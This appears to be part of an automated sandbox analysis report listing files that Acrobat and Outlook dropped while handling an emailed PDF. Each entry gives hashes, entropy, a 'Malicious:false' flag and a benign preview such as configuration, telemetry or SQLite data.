                            Preview:{"analyticsData":{"responseGUID":"36052df6-67c3-45e5-9367-d29deb304ee6","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1729706431518,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1729531456547}}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):0.8112781244591328
                            Encrypted:false
                            SSDEEP:
                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                            Malicious:false
                            Reputation:unknown
                            Preview:....
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):2818
                            Entropy (8bit):5.144683562771103
                            Encrypted:false
                            SSDEEP:
                            MD5:8BC554BF69E5C72509AC92AD2B654232
                            SHA1:7A2138D17EB6F94CFBC24D4E24F9A45D6E2D1330
                            SHA-256:4414FFAFE9097074CCE88D0D6594CF615BD11BA4B6C51D2DEA1F2C67F14D0411
                            SHA-512:361178EF17B55D19A4EC7013463C8E346CBA113A5C6B11E3DAFA474ACFB836B7796380755C0ECEE836E140ED0968137B33B8EC2A9479E29D24289A8E100488B6
                            Malicious:false
                            Reputation:unknown
                            Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"e66167040168e82182208762736263ad","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1729531456000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"fe8c02bbc938bc8fb9c91237f73719b2","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1729531455000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"fe40b43f89bc081ae03f299c3d90d162","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1026,"ts":1729531455000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"a40415185e0e0bca63cf11e6c62c05ad","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1055,"ts":1729531455000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"533664acaeee7b3e38ccc4aba0a4ca92","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1038,"ts":1729531455000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"64171a43cfc1e3ac2a04e5cd3fca606e","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","siz
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                            Category:dropped
                            Size (bytes):12288
                            Entropy (8bit):0.9889414720107857
                            Encrypted:false
                            SSDEEP:
                            MD5:232D5A2FED55EC8407137E113774B686
                            SHA1:5C20EF8D81A18E6511D93B674BE7E6070879094D
                            SHA-256:100306F63F9AFC71A5D26CC994D882514BF875A20E0E23331DF0A06B8C55FB65
                            SHA-512:02D5D1491C5E4F93CCB93D5B0B93575698B98178F706872197B1F6140E5C90AFA99AEA36E6612104ADA246FF55E03EABB00BC5761A3C4F4342D3EA95F1657F1C
                            Malicious:false
                            Reputation:unknown
                            Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:SQLite Rollback Journal
                            Category:dropped
                            Size (bytes):8720
                            Entropy (8bit):1.3453865255150321
                            Encrypted:false
                            SSDEEP:
                            MD5:CB975E841A96FC8A5C1F16DA5C444BE9
                            SHA1:29612C25ED8993D84D62174F5AE79C08063834BA
                            SHA-256:16F5D5D280DB809C4A71C9B2726CC71E75FB4DB36EBC298A6C330FB79CE2414B
                            SHA-512:FC87F4705444B2DD64F40EF225DB6463DBCDBF7FAF073D94AA4F8CD19C0C9F8A98B1C0A55E1B87B08D1D4C20BB0C2DD0B4F026EF3E577A7E1918CD8D06420878
                            Malicious:false
                            Reputation:unknown
                            Preview:.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:data
                            Category:modified
                            Size (bytes):231348
                            Entropy (8bit):4.38278811557967
                            Encrypted:false
                            SSDEEP:
                            MD5:85754B276331539938136ED70F9A2CB2
                            SHA1:59F61D4647463180F4762F84BFFA739A8A7C9019
                            SHA-256:D99325FE26E1C233386E0934A462D1E9BADA8A33A3F6A2E6964F8B1D80D5B837
                            SHA-512:6FD5B57BD8137C44DB7FC5F3DC7186D00E064FFC2947CAA0620FD8BE5967B79E79B36E277D717470208E8FAF4D5106B9272E464CE587F0FA098DE6AF1FB5419B
                            Malicious:false
                            Reputation:unknown
                            Preview:TH02...... ..+...#......SM01X...,... ....#..........IPM.Activity...........h...............h............H..h..........F>...h.........n..H..h\cal ...pDat...h.h..0...`......hw.$W...........h........_`Mk...h;.$W@...I.lw...h....H...8.Rk...0....T...............d.........2h...............kU.I...........!h.............. h.0S.....x.....#h....8.........$h.n......8....."h..5.......5...'h..............1hw.$W<.........0h....4....Rk../h....h.....RkH..h.{..p.........-h .............+h..$W........................ ..............F7..............FIPM.Activity.,nwForm....Standard...hJournal Entry..hIPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000....Microsoft...This form is used to create journal entries......[1.kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:XML 1.0 document, ASCII text, with very long lines (1869), with no line terminators
                            Category:dropped
                            Size (bytes):1869
                            Entropy (8bit):5.084239393243018
                            Encrypted:false
                            SSDEEP:
                            MD5:98E4C25AC12782A22452219470994E3D
                            SHA1:1FF5D11DB868ADB75F611FFA1BB8E2D40B026E9B
                            SHA-256:88C2E21651CE3733CDD5E602F13786F858CA56810DB96F79081082406D8E2FE8
                            SHA-512:AC153AFDD115FE11575545DD2FE4E8D0325B57BA710CC618DBEBBB85510F072A85792C1067E65D7391DC91CD8DDF65BA22527F2F0707E44A3E565F01CD9DA03F
                            Malicious:false
                            Reputation:unknown
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>12</Count><Resource><Id>Aptos_26215680</Id><LAT>2024-10-21T17:24:02Z</LAT><key>29939506207.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos_45876480</Id><LAT>2024-10-21T17:24:02Z</LAT><key>27160079615.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_26215424</Id><LAT>2023-10-06T09:25:29Z</LAT><key>31558910439.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215680</Id><LAT>2023-10-06T09:25:29Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-10-06T09:25:29Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos Display_45876480</Id><LAT>2023-10-06T09:25:29Z</LAT><key>30264859306.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos_
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):322260
                            Entropy (8bit):4.000299760592446
                            Encrypted:false
                            SSDEEP:
                            MD5:CC90D669144261B198DEAD45AA266572
                            SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
                            SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
                            SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
                            Malicious:false
                            Reputation:unknown
                            Preview:51253fe60063c31af0d295afb42228b0:v2:2:1:1590:2:8479:76bd602437550e98c9043d06a55186ab7d95dea5a0e935a599f73e62a8c9b158e0afcb19351f6c353940c06a38172b94d18c02cf92bb8a80184eccca0392b259ab3e71dae73e491c7941997cb36ad4a198661f622dad478d840f66d530a0dde78acea3367f91fff62fbb3dc18faff0c708ad30edef5bea8b22c5fd782b770d8993386eaa784fd19a3c3e1db3b537b1a94d3d4fbd46f8df8fddf6d16611969fe0a97c50e0f3ac24750c93257cf5c161184aa7385800c87d803b339632a3d8ec7fe17a0afd83ce9e9d0e3f7b8d579637928a811f1f7e6d1887df2ddc7d4f752c4d600235e426c92c7bf8a1362f95457998cc0e5d4261f0efa4fada0f866dbcefb407dacab7a2914e91c2f08200f38c2d9d621962145b1464b0f204b326118a53ecdcab22bff005fdd5257c99a6dc51ac0600a49f2ef782396987e78c08b846dad5db55e8ccefffc64863bc2c3e90b95a09d25d0814a848c98fe01a82d4e30e6682dd546e12c45ca0d280a45295ab4bd632dafb070edfdc3c9e38313d5aeb195972986f8011b66817028fd8c78b67a0ac7e780eecc3fb6a31f5a025b8a9a3db278a98c0696aeaac739b18688b0f9c7d751bba02cc5f4e41853fb119b3c0c915059aaa92971244a1989124f12881ca88e6410df70b793a2c3a736ff4
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):10
                            Entropy (8bit):2.6464393446710157
                            Encrypted:false
                            SSDEEP:
                            MD5:5039AE7E54BBEEC3566093290722D204
                            SHA1:C20ACF9EE003CAAC0DCA92D9D8415388E9ED981C
                            SHA-256:02DBB92243D59F3749A2CAFBCA663EC3FFE2D92578A4C2CFB6CF0766008622D8
                            SHA-512:3C5ECA99E36D5087C52556DC563B6A1E8B50AC1B6BB9282AB197F6D5B0FDEF4B3457F24725E126D7842C99BCD3D05EF6BFABA65492A8E7C84A6028F9D81829C7
                            Malicious:false
                            Reputation:unknown
                            Preview:1729531444
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):178267
                            Entropy (8bit):5.290265650051476
                            Encrypted:false
                            SSDEEP:
                            MD5:3EAEB1AF424AA09815CA7518D4428E95
                            SHA1:BAD2DBC59BA3EF14E16D6AC82821ADD4405C2C68
                            SHA-256:C652C711AABCF83C41628633E626A76BD2065AA0C6EC65C38A92B83E88F3F358
                            SHA-512:814B7561777081F40FF76AF6D8FEA358AC4E39CD0B3875D0E6CC3BA2BAF3ECC4B5389FBFDA8701F7D2C7CE6F622F906AB982ADD41788CBF14E175D91BEAE120F
                            Malicious:false
                            Reputation:unknown
                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-10-21T17:24:02">.. Build: 16.0.18209.40127-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:SQLite 3.x database, last written using SQLite version 3034001, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):0.09304735440217722
                            Encrypted:false
                            SSDEEP:
                            MD5:D0DE7DB24F7B0C0FE636B34E253F1562
                            SHA1:6EF2957FDEDDC3EB84974F136C22E39553287B80
                            SHA-256:B6DC74E4A39FFA38ED8C93D58AADEB7E7A0674DAC1152AF413E9DA7313ADE6ED
                            SHA-512:42D00510CD9771CE63D44991EA10C10C8FBCF69DF08819D60B7F8E7B0F9B1D385AE26912C847A024D1D127EC098904784147218869AE8D2050BCE9B306DB2DDE
                            Malicious:false
                            Reputation:unknown
                            Preview:SQLite format 3......@ ..........................................................................K.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:SQLite Rollback Journal
                            Category:dropped
                            Size (bytes):4616
                            Entropy (8bit):0.1384465837476566
                            Encrypted:false
                            SSDEEP:
                            MD5:345FFA371526A5934E99545ED894B310
                            SHA1:5436B8F929722358C14CBF91A594EA659956BE2D
                            SHA-256:209431A9E4972C01FDB9F029A39D10AF6A83EB24A1E168B1183E9341470C449A
                            SHA-512:3094C2F01265D90F47AB6DAFE32F21E3A2F43577A2910253D1ABF4EC5860B22BDFE070BC38EDE9FC398C096D7AB5A8AED37B493A40388AEDD2459955812EE4C8
                            Malicious:false
                            Reputation:unknown
                            Preview:.... .c.....Y8......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):32768
                            Entropy (8bit):0.04435211668231303
                            Encrypted:false
                            SSDEEP:
                            MD5:0650AABC7A7D522CF75866E669B70C23
                            SHA1:4B74B39BB2AB8F5F247261B69E84D2BF5F573F77
                            SHA-256:9D8EF0AAA910C9C70CDCAED833948F85B7850846A94F5005AB9A1334D7C99E7D
                            SHA-512:F6B73BD976F761FB664E51B1A352570D53D556F6F8950DDDBC91C30A42C08C3BA4D3431EA56901C6866F31DEC2CA3F17F5A02370B5C5E8485F8645E2D5D79B3A
                            Malicious:false
                            Reputation:unknown
                            Preview:..-.....................M..#. y.{..g.l..V..N[gH...-.....................M..#. y.{..g.l..V..N[gH.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:SQLite Write-Ahead Log, version 3007000
                            Category:dropped
                            Size (bytes):45352
                            Entropy (8bit):0.39406565268786825
                            Encrypted:false
                            SSDEEP:
                            MD5:F29B2CF69468912ECAC14102D5560EEE
                            SHA1:379B1BF951B2DD5C72CD1FAD73B8C5A562A5A8B3
                            SHA-256:8FDCBBC0C537A865478A5FF26B08CA62A4D75A0234EAFE05BCFD47360CE2E14C
                            SHA-512:9B2CE574473502096F2FE2B1A73EE9F59DB1EA8E089EA57300814C548559AC85201A502421FF90AEC8A78B22F9F8D0A435B08753C9A269940E7DDCF5260BECC7
                            Malicious:false
                            Reputation:unknown
                            Preview:7....-..........{..g.l..;.............{..g.l..L3V.....SQLite format 3......@ ..........................................................................K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:PDF document, version 2.0 (zip deflate encoded)
                            Category:dropped
                            Size (bytes):15653
                            Entropy (8bit):7.029312418152099
                            Encrypted:false
                            SSDEEP:
                            MD5:60415530DB68CEF4FD67248DC62AAE08
                            SHA1:6009CD135567D27B77AEB3B099076E799A3B9AA2
                            SHA-256:F11CFA6DE54F7BD66B3901F12B8A9687E92D6EEF28A0B72A03241F7EA2913FAB
                            SHA-512:8FA092F5ACAE9BF9F01801BA9E8C9793C55C3765648FFD8050038398B240EB7D76352B1F5F822B6D2BA6076516E8405B65305B96DFA2E6772F2A0E3383C84A6C
                            Malicious:false
                            Reputation:unknown
                            Preview:%PDF-2.0.%.....6 0 obj<</Linearized 1/L 15653/O 11/E 12301/N 1/T 15361/H [ 1153 300]>>.endobj. .7 0 obj<</Root 8 0 R/Info 4 0 R/ID[<0B35AC7F67649DBE680DD43D61BFC20A><51E904BFB7F42F333016A5B65828158B>]/Size 32/Prev 15362/Length 76/Type/XRef/Filter/FlateDecode/DecodeParms<</Columns 4/Predictor 12>>/Index[6 26]/W[1 2 1]>>stream.x.cbd.g`b`8.$.o.X..L...b.Y.....@B<.H...J\}.R...!..\...x..I.X...g&.k...V....endstream.endobj.startxref.0.%%EOF. .8 0 obj<</Type/Catalog/Pages 2 0 R/AcroForm 10 0 R/Metada
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:
                            MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                            SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                            SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                            SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                            Malicious:false
                            Reputation:unknown
                            Preview:[ZoneTransfer]..ZoneId=3..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):2476
                            Entropy (8bit):3.5147289532313173
                            Encrypted:false
                            SSDEEP:
                            MD5:82201418523C97E7FCAC6C61FB2D6341
                            SHA1:AB5A4AE9EA2916133BDEDC49E03EC3793AB7ABBD
                            SHA-256:41D4C92AF1F69457319FAFAFF82EA4EDDD658CD9C391F93A969A118753FDC63E
                            SHA-512:864F6360D23ED29DA2931D875B415179F460AAB79FBC353E4BD3372CE6504A2A54C2B3871EF666179632AB4B19655DDEAA7E1D6ADD5ADDA4DD7C4878F4721676
                            Malicious:false
                            Reputation:unknown
                            Preview:......S.o.m.e. .p.e.o.p.l.e. .w.h.o. .r.e.c.e.i.v.e.d. .t.h.i.s. .m.e.s.s.a.g.e. .d.o.n.'.t. .o.f.t.e.n. .g.e.t. .e.m.a.i.l. .f.r.o.m. .m.o.n.t.g.o.m.e.r.y.@.r.e.d.b.r.i.c.k...c.a... .H.Y.P.E.R.L.I.N.K. .".h.t.t.p.s.:././.a.k.a...m.s./.L.e.a.r.n.A.b.o.u.t.S.e.n.d.e.r.I.d.e.n.t.i.f.i.c.a.t.i.o.n.".......................................................................................................................................................................................................................................................................................r...v................................................................................................................................................................................................................................................................................................................................-D..M...............-D..M............*...$..$.If........!v..h.#v....:V.......t.....6......5.......4
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:ASCII text, with very long lines (28731), with CRLF line terminators
                            Category:dropped
                            Size (bytes):20971520
                            Entropy (8bit):0.1793600547241809
                            Encrypted:false
                            SSDEEP:
                            MD5:383935609287427D5309DFDCC83A4401
                            SHA1:99871EE90450F9EE7186832FADDD0B377BAB57C2
                            SHA-256:CD19A779B0A5165B361D7CE646A89E88F2ECCAE7FD4F8827613EDF15D693FAB4
                            SHA-512:F7D687A50CB86726CBFD86B9FCF444A0EF6C6037499CC09B28AA53CBF7E307E632D0AC448C97FB14FD58E6F3C062DDC097C9371E89418A3F156EA65D58F78EF6
                            Malicious:false
                            Reputation:unknown
                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..10/21/2024 17:23:59.941.OUTLOOK (0x1A0C).0x1A08.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":21,"Time":"2024-10-21T17:23:59.941Z","Contract":"Office.System.Activity","Activity.CV":"j6+0I3b9LEaoVJJv45QbCA.4.9","Activity.Duration":12,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...10/21/2024 17:23:59.957.OUTLOOK (0x1A0C).0x1A08.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":23,"Time":"2024-10-21T17:23:59.957Z","Contract":"Office.System.Activity","Activity.CV":"j6+0I3b9LEaoVJJv45QbCA.4.10","Activity.Duration":9992,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVe
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):20971520
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:
                            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                            Malicious:false
                            Reputation:unknown
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):246
                            Entropy (8bit):3.4969396028059014
                            Encrypted:false
                            SSDEEP:
                            MD5:9B1D509133DC25DB143800B3C25FA70C
                            SHA1:FB536FD04E3A302C6F941869A37BB6C9EC3D7DDF
                            SHA-256:FA3F37F2B8E5F84C0BE33C69A5BC45E93C676D054A3C2DE4C4C2CA8664C33A59
                            SHA-512:C87C399618400ED770F39CDBCCE60262BF61EEC6DA5A02594775519086E1ED2CFE9347605DAFC62263F39A09E927C116B41381419A3F47B79BD443175603058B
                            Malicious:false
                            Reputation:unknown
                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.1./.1.0./.2.0.2.4. . .1.3.:.2.4.:.1.7. .=.=.=.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                            File Type:data
                            Category:modified
                            Size (bytes):106496
                            Entropy (8bit):4.486300429611531
                            Encrypted:false
                            SSDEEP:
                            MD5:A969A713026D35FDA35BC8E3787038BB
                            SHA1:5C47C92FB835622AA8779528FB3D763C9C701C71
                            SHA-256:ECC019CB6AA6AAAA6F6C1B633D11168FA9B631F84FEE7500616917A6D563DF92
                            SHA-512:5985ADF4E0115298BD07CD09A9CB1361BA2FB611A156757B22CA02114C250FC6F630AB5309568D93609B303D1981DDD1C4CE41B3F30426F6EEB5204CF888BDC2
                            Malicious:false
                            Reputation:unknown
                            Preview:............................................................................`...........rk(..#..................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1................................................................Y..........rk(..#..........v.2._.O.U.T.L.O.O.K.:.1.a.0.c.:.6.5.9.5.2.e.3.e.a.6.a.1.4.2.5.9.8.b.1.c.a.4.c.9.3.3.f.5.1.5.b.4...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.0.2.1.T.1.3.2.3.5.9.0.7.0.3.-.6.6.6.8...e.t.l.......P.P.........rk(..#..........................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PDF document, version 1.6, 0 pages
                            Category:dropped
                            Size (bytes):358
                            Entropy (8bit):5.049075487825134
                            Encrypted:false
                            SSDEEP:
                            MD5:E9DDE2429297130B8B67F7585E8D6C04
                            SHA1:6E48E252979E501F43681AA0B0A42F10CA137BBB
                            SHA-256:A10A1359501AB2344F41739F923155C1925D36FBF28F0EA3321716F266E7B954
                            SHA-512:932D28019AA48677472CD933724DCD426B4241F5B44F634C986BACEC4890C8100599BF4AFECA1E2967840AF266F21F49ABD10BAECA0C57C63D6DAC018A616E51
                            Malicious:false
                            Reputation:unknown
                            Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<E699DEF0C3DD3A48A4F4372E0A514645><E699DEF0C3DD3A48A4F4372E0A514645>]>>..startxref..127..%%EOF..
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:ASCII text, with very long lines (393)
                            Category:dropped
                            Size (bytes):16525
                            Entropy (8bit):5.353642815103214
                            Encrypted:false
                            SSDEEP:
                            MD5:91F06491552FC977E9E8AF47786EE7C1
                            SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                            SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                            SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                            Malicious:false
                            Reputation:unknown
                            Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):29752
                            Entropy (8bit):5.411418326623777
                            Encrypted:false
                            SSDEEP:
                            MD5:55DFBF0F111073E5BA7879B170A1001C
                            SHA1:35B5B06AEEC1E85388992B27927C4C4330F190B5
                            SHA-256:2F9268FEBBFE4E95736847A4283414D39002B03298DF4C2D13C020082C634025
                            SHA-512:97458FD04B26D56B43F61CF988DC9191DB6619BEDF54EA53521CAAAE7735909C44799F106A342A4844562442788752F10D05BD6DD641755824F5754F6FEE77E4
                            Malicious:false
                            Reputation:unknown
